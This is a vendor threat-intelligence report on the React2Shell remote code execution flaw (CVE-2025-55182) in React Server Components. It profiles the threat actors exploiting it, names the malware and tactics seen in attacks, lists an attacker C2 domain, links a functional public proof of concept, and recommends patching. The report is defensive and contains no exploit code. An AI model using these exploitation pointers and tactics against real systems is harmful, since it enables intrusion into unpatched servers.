Executive Summary

The React2Shell vulnerability, formally identified as CVE-2025-55182, represents a critical unauthenticated remote code execution (RCE) flaw in React Server Components. Since its public disclosure in early December 2025, this vulnerability has been weaponized by a spectrum of threat actors, including ransomware operators, advanced persistent threat (APT) groups, and financially motivated cybercriminals. The flaw, which carries a maximum CVSS v3.x score of 10.0, enables attackers to execute arbitrary code on affected servers through a single HTTP request, bypassing authentication and gaining control with the privileges of the web server process. Exploitation in the wild has been rapid and widespread, with observed payloads ranging from ransomware and cryptominers to sophisticated Linux backdoors. The attack surface includes popular frameworks such as Next.js and any application leveraging vulnerable versions of react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack. Immediate patching and comprehensive threat hunting are strongly advised.

Threat Actor Profile

Multiple threat actor categories are actively exploiting React2Shell. Ransomware operators are leveraging the flaw for initial access, lateral movement, and subsequent data encryption. China-nexus APT groups, including Earth Lamia (UNC5454), Jackpot Panda, UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595, have been observed deploying custom Linux backdoors and tunneling tools, often targeting cloud infrastructure such as AWS and Alibaba Cloud. Iran-nexus actors, though less specifically identified, are also exploiting the vulnerability for initial access and persistence. These groups employ advanced tactics such as masquerading malware as system binaries, anti-forensics (timestomping, shell history clearing), and the use of custom command-and-control (C2) infrastructure. Financially motivated cybercriminals are deploying cryptominers and commodity malware, often using automated exploitation frameworks and public proof-of-concept (PoC) code.

Technical Analysis of Malware/TTPs

The React2Shell vulnerability arises from improper input validation in the deserialization logic of React Server Components. Attackers can craft a malicious HTTP request that injects arbitrary JavaScript or shell commands, which are then executed with the privileges of the web server. Exploitation does not require authentication, making internet-exposed applications particularly vulnerable.

Observed malware includes the XMRig cryptominer, typically delivered via shell scripts such as sex.sh, and a suite of Linux backdoors including PeerBlight, COMPOOD, HISONIC, and ANGRYREBEL.LINUX. These payloads are often downloaded and executed using wget or curl, with persistence established through cron jobs, systemd services, or shell configuration file injection. Advanced TTPs include the deployment of reverse proxy tunneling tools like MINOCAT and FRP, masquerading of malware as legitimate system binaries (notably the OpenSSH daemon), and anti-forensic measures such as timestomping and shell history clearing.

APT groups have demonstrated a preference for in-memory web shell deployment, Unicode-obfuscated payloads, and the use of custom C2 domains such as reactcdn.windowserrorapis[.]com. Ransomware operators have been observed encrypting data post-exploitation, leveraging the initial foothold for lateral movement within cloud and on-premises environments.

Exploitation in the Wild

Since the public disclosure of CVE-2025-55182, exploitation has been observed globally, with a particular focus on cloud infrastructure, international virtual private servers (VPS), and web applications built with React and Next.js. Telemetry indicates significant targeting of the Asia-Pacific region, including Taiwan, Vietnam, and China, as well as international VPS providers.

Ransomware campaigns have rapidly adopted the exploit, using it to gain initial access and deploy encryption payloads. Financially motivated actors are deploying cryptominers and commodity malware at scale, often using automated scanning and exploitation tools. China-nexus APT groups are leveraging the flaw for espionage and persistent access, deploying custom backdoors and tunneling tools to maintain long-term control over compromised infrastructure. Iran-nexus actors have also been observed exploiting the vulnerability, though their specific payloads and objectives remain less well-documented.

Multiple functional and non-functional PoCs are circulating in the public domain, including those with Unicode obfuscation and in-memory web shell deployment techniques. The rapid weaponization of the exploit underscores the criticality of immediate remediation.

Victimology and Targeting

Victims of React2Shell exploitation span a broad range of sectors, with a concentration in organizations operating cloud infrastructure, web application hosting, and SaaS platforms. Notably, AWS and Alibaba Cloud environments have been specifically targeted by China-nexus APT groups, with incidents observed in the Asia-Pacific region and among international VPS providers. The attack surface includes any organization running vulnerable versions of React Server Components or frameworks such as Next.js with the App Router feature enabled.

Ransomware operators are indiscriminate in their targeting, exploiting any exposed and vulnerable instance to maximize financial gain. APT groups, by contrast, exhibit more selective targeting, focusing on organizations of strategic interest, particularly those with valuable intellectual property or access to sensitive cloud infrastructure.

Mitigation and Countermeasures

Immediate patching is the most effective mitigation strategy. Organizations should upgrade to React Server Components versions 19.0.1, 19.1.2, or 19.2.1 and above, with 19.2.2 or 19.2.3 recommended for comprehensive coverage. For Next.js, upgrade to the latest stable release in your deployment line, referencing official advisories for specific patched versions.

A thorough audit of all application dependencies is essential to identify and remediate vulnerable packages. Security teams should monitor for indicators of compromise, including outbound connections to known C2 domains and IP addresses, suspicious wget or curl activity, creation of hidden directories, unauthorized process terminations, and modifications to shell configuration files.

Proactive threat hunting should focus on identifying new cron jobs, systemd services, and injected shell scripts indicative of persistence mechanisms. Organizations are advised to review vendor and threat intelligence updates regularly, as the threat landscape surrounding React2Shell is rapidly evolving.

Network segmentation, least privilege access controls, and robust logging are recommended to limit the blast radius of successful exploitation. Where possible, restrict public exposure of applications using React Server Components and implement web application firewalls (WAFs) with custom rules to detect and block exploit attempts.

References

Google Cloud Threat Intelligence: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182

Wiz Blog: https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182

Trend Micro PoC Analysis: https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html

Huntress PeerBlight Backdoor: https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell

React Security Advisory: https://react.dev/security/advisories/CVE-2025-55182

Next.js Security Advisory: https://nextjs.org/security/advisories/CVE-2025-55182

NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

Functional PoC (GitHub, ejpir): https://github.com/ejpir/react2shell-poc

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to empower security teams with actionable insights and proactive defense capabilities. For questions about this report or to learn more about how Rescana can help secure your organization, contact us at ops@rescana.com.